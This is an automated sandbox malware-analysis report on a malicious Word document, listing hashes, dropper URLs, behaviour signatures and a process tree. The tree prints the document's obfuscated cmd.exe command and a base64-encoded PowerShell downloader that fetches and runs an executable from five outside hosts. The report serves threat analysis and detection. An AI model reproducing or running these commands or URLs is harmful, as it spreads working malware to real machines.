Analysis

  • max time kernel
    46s
  • max time network
    37s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-11-2024 02:12

General

  • Target

    b10d4465157273d3b106ed97b74147ddb35efb344cbd843e54f16391caae51e0.doc

  • Size

    77KB

  • MD5

    72bf256119b652762d7f57f3873cfcd0

  • SHA1

    1998cd15554674254453b9d1bad3f7e8c9bea5cc

  • SHA256

    b10d4465157273d3b106ed97b74147ddb35efb344cbd843e54f16391caae51e0

  • SHA512

    e38444218e794249b11088bc3b39ffd3a0ddde0c9779505409e407a41f18b14da15f906aceafb864c267303bc5ef08ee5aa45453acdf762a71b60f9b8f19d481

  • SSDEEP

    768:Uoo2oooogG7oXoooo7ooQoooDoooooIoo4pJcaUitGAlmrJpmxlzC+w99NB33yhk:TptJlmrJpmxlRw99NBnyA1dfafKI+j

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://djtosh.co.za/rrp

exe.dropper

http://virginie.exstyle.fr/a

exe.dropper

http://projettv.baudtanette.fr/FZ00c23Z

exe.dropper

http://mujerproductivaradio.jacquelinezorrilla.com/O

exe.dropper

http://esinvestmentinc.ezitsolutions.net/UIf

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\b10d4465157273d3b106ed97b74147ddb35efb344cbd843e54f16391caae51e0.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4252
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /V:^o ^ ^ /R" ^s^e^T ^ ^ ^Qud^b=AACAg^AA^IA^ACAg^A^A^I^AACAg^A^AI^AACA^g^AA^I^AACAgA^A^IA^ACAgAQ^fA0^HA7B^Aa^AMGA^0BQ^Y^A^MGA9^B^w^OAs^GAhBQZ^AI^H^AiBw^O^A^I^E^A^w^BgcA^QCAg^AQbA^U^GA0B^Q^S^A0C^AlBw^aA8^GA^2B^g^b^A^kEA7^A^QKAI^E^A^wB^gcA^QCAgAA^LA^4^EA^Z^Bwc^A^QCA^oA^QZ^A^wG^ApB^gR^A^Q^GAh^B^wb^A^wG^Au^BwdA8^G^AEB^g^L^A^gGAkBQW^A^QC^A^7BQeAI^HA0^B^weA^kC^A^k^Bw^U^Ao^HAkA^A^I^A4^GApBA^I^A^4^E^AZBwcA^QCAo^A^AaAMG^AhBQZAIHAvB^gZ^As^D^An^AQZAg^HAl^B^g^L^AcCAr^A^Q^b^AEF^A^D^B^AJ^AsCAn^A^A^XAcC^Ar^AwYAkGAs^Bg^Y^A^U^HAwBg^OA^Y^HAuBQZA^QCA^9A^g^QA^A^H^A^y^B^AJ^AsDAn^A^AOA^QD^A^3^A^w^JA^AC^A9A^A^IA^0GARBwQA^QC^A7A^Q^K^AcCA^A^Bw^J^A^gC^A^0B^Qa^A^w^GA^wBwUA4C^An^A^gZ^A^kEAVBw^LA^Q^H^Al^B^gb^A4CA^zBgbA8^G^Ap^BAdAUH^AsB^w^b^AM^HA^0^B^Q^a^A^oHA^lBgL^AMG^Au^B^QaAQHAuBQ^Z^A0G^A0^BwcA^U^GA^2BgbAkG^Az^B^Q^Z^A8CAv^A^g^OA^A^HA^0^B^Ad^Ag^G^A^A^B^w^T^A^8C^A^t^Bw^bAMGA^uA^QYAwG^A^sB^Q^a^AIHA^yB^w^b^AoHA^l^B^gbA^kG^As^B^QZA^UHA^x^Bw^Y^AE^G^A^qBg^LA8GApB^AZ^A^E^G^Ay^B^QY^A^YHA^p^BA^dAMGA^1^B^A^ZA8GAy^BAcAI^H^AlBg^a^A^UHAtBw^L^A8C^A6^A^Ac^AQ^HA^0B^A^aA^AEA^a^Bw^M^AI^D^A^jB^AMA^A^D^Aa^B^gRA8C^A^yBg^Z^A^4CAl^BAdAQH^AlBgbAE^G^A0BAZA^U^HA^hBgYA4C^A2^BA^d^A^Q^H^A^lB^gaA^8^G^AyBAcA8C^AvA^g^O^AA^HA^0B^A^d^AgG^A^A^B^Q^Y^A^8C^AyBg^Z^A^4C^A^l^B^A^b^Ak^H^A^0B^wcA^g^H^A^l^B^g^L^AU^G^A^pBgb^Ak^GAnB^gc^A^kG^A2^Bw^L^A^8CA6^A^AcA^Q^HA^0^BAa^A^A^EAw^Bgc^AIH^AvAQY^A^oH^Au^AwbA^M^G^Au^A^AaAM^H^AvB^AdA^o^GAk^B^w^LA8CA6AAc^AQHA^0BA^a^AcCA9A^AZAM^FA^6BAJA^s^DA^0B^gbAU^GA^p^B^Ab^AM^E^A^iBQZAcFA^u^A^A^dA^UG^AOB^A^I^A^QHAjB^Q^Z^AoG^A^iB^w^bA^0CA^3^BQ^ZA^4G^A9^AAa^A^QG^A^Z^B^AJ ^e^-^ l^le^hsre^w^op& f^Or /^l %^u ^IN ( ^ ^1^0^53 ^,^ ^ ^-1, ^ ^ 0) d^O ^sE^t ^Y4^Z=!^Y4^Z!!^Qud^b:~%^u, 1!&&^i^f %^u ^l^eQ ^0 C^a^lL %^Y4^Z:^~ -^10^5^4% "
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:4120
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e JABZAGQAaAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB6AFMAZAA9ACcAaAB0AHQAcAA6AC8ALwBkAGoAdABvAHMAaAAuAGMAbwAuAHoAYQAvAHIAcgBwAEAAaAB0AHQAcAA6AC8ALwB2AGkAcgBnAGkAbgBpAGUALgBlAHgAcwB0AHkAbABlAC4AZgByAC8AYQBAAGgAdAB0AHAAOgAvAC8AcAByAG8AagBlAHQAdAB2AC4AYgBhAHUAZAB0AGEAbgBlAHQAdABlAC4AZgByAC8ARgBaADAAMABjADIAMwBaAEAAaAB0AHQAcAA6AC8ALwBtAHUAagBlAHIAcAByAG8AZAB1AGMAdABpAHYAYQByAGEAZABpAG8ALgBqAGEAYwBxAHUAZQBsAGkAbgBlAHoAbwByAHIAaQBsAGwAYQAuAGMAbwBtAC8ATwBAAGgAdAB0AHAAOgAvAC8AZQBzAGkAbgB2AGUAcwB0AG0AZQBuAHQAaQBuAGMALgBlAHoAaQB0AHMAbwBsAHUAdABpAG8AbgBzAC4AbgBlAHQALwBVAEkAZgAnAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAQwBRAG0AIAA9ACAAJwA3ADQAOAAnADsAJAByAHAAQgA9ACQAZQBuAHYAOgBwAHUAYgBsAGkAYwArACcAXAAnACsAJABDAFEAbQArACcALgBlAHgAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQAcwBZAE4AIABpAG4AIAAkAHoAUwBkACkAewB0AHIAeQB7ACQAWQBkAGgALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAcwBZAE4ALAAgACQAcgBwAEIAKQA7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAcgBwAEIAOwBiAHIAZQBhAGsAOwB9AGMAYQB0AGMAaAB7AH0AfQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4700

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCDD98A.tmp\sist02.xsl

    Filesize

    245KB

    MD5

    f883b260a8d67082ea895c14bf56dd56

    SHA1

    7954565c1f243d46ad3b1e2f1baf3281451fc14b

    SHA256

    ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

    SHA512

    d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sn05iy5w.rle.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

    Filesize

    1KB

    MD5

    159f1be24a335ed517e26e42c809394f

    SHA1

    d4a8c1534b77c958b211044ac6e6e7c3b6d87082

    SHA256

    22322bfeaaeba9904fa2779138f41c852122fda108e962561e16d44ecbcd3629

    SHA512

    7cca7caa449adbb867ce64dd72a1cf879b4b412922a3bba7beff1255eed22c7eb659081b22f14ba076b1a49cf9c39b1a8efe2046022b7133f4352b929f378865

  • memory/4252-20-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

    Filesize

    2.0MB

  • memory/4252-61-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

    Filesize

    2.0MB

  • memory/4252-8-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

    Filesize

    2.0MB

  • memory/4252-5-0x00007FFC29530000-0x00007FFC29540000-memory.dmp

    Filesize

    64KB

  • memory/4252-7-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

    Filesize

    2.0MB

  • memory/4252-10-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

    Filesize

    2.0MB

  • memory/4252-15-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

    Filesize

    2.0MB

  • memory/4252-12-0x00007FFC27230000-0x00007FFC27240000-memory.dmp

    Filesize

    64KB

  • memory/4252-9-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

    Filesize

    2.0MB

  • memory/4252-4-0x00007FFC29530000-0x00007FFC29540000-memory.dmp

    Filesize

    64KB

  • memory/4252-17-0x00007FFC27230000-0x00007FFC27240000-memory.dmp

    Filesize

    64KB

  • memory/4252-16-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

    Filesize

    2.0MB

  • memory/4252-21-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

    Filesize

    2.0MB

  • memory/4252-1-0x00007FFC6954D000-0x00007FFC6954E000-memory.dmp

    Filesize

    4KB

  • memory/4252-0-0x00007FFC29530000-0x00007FFC29540000-memory.dmp

    Filesize

    64KB

  • memory/4252-6-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

    Filesize

    2.0MB

  • memory/4252-11-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

    Filesize

    2.0MB

  • memory/4252-14-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

    Filesize

    2.0MB

  • memory/4252-13-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

    Filesize

    2.0MB

  • memory/4252-29-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

    Filesize

    2.0MB

  • memory/4252-30-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

    Filesize

    2.0MB

  • memory/4252-31-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

    Filesize

    2.0MB

  • memory/4252-19-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

    Filesize

    2.0MB

  • memory/4252-2-0x00007FFC29530000-0x00007FFC29540000-memory.dmp

    Filesize

    64KB

  • memory/4252-50-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

    Filesize

    2.0MB

  • memory/4252-52-0x00007FFC6954D000-0x00007FFC6954E000-memory.dmp

    Filesize

    4KB

  • memory/4252-54-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

    Filesize

    2.0MB

  • memory/4252-55-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

    Filesize

    2.0MB

  • memory/4252-3-0x00007FFC29530000-0x00007FFC29540000-memory.dmp

    Filesize

    64KB

  • memory/4252-18-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

    Filesize

    2.0MB

  • memory/4252-65-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

    Filesize

    2.0MB

  • memory/4700-45-0x0000025077970000-0x0000025077992000-memory.dmp

    Filesize

    136KB